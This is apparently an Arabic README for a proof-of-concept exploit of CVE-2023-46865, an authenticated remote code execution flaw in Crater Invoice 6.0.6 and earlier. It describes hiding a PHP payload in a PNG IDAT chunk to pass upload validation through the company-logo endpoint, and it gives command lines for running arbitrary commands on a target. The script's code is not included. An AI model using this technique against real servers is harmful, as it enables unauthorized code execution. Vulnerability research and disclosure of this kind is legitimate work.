
Crater <=6.0.6, CVE-2023-46865 RCE بعد المصادقة (المسؤول الأعلى)
Crater <=6.0.6، CVE-2023-46865 ثغرة تنفيذ الأوامر بعد المصادقة (المشرف الفائق)
تطبيق Crater Invoice معرّض لثغرة رفع ملفات غير مقيدة من نوع خطير بسبب نقص التحقق المناسب من الإدخال. يمكن تجاوز فئة التحقق من Base64Mime عن طريق تضمين حمولة PHP صالحة داخل كتلة صورة IDAT. يمكن للمستخدم بصلاحيات المشرف الفائق رفع الحمولة المُعدّة عبر شعار الشركة في /api/v1/company/upload-logo.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
الخيارات:
-h, --help عرض رسالة المساعدة هذه والخروج
--target TARGET رابط الهدف
--email EMAIL البريد الإلكتروني
--password PASSWORD كلمة المرور
--cmd CMD الأمر المراد تنفيذه
- Crater 6.0.6
- Kali 6.1.0
faisalfs10x - للمساعدة في تطوير إثبات المفهوم.
النص البرمجي مخصص فقط للتحليل الأمني والبحث، وبالتالي لا أتحمل المسؤولية إذا تم استخدامه في أنشطة غير قانونية.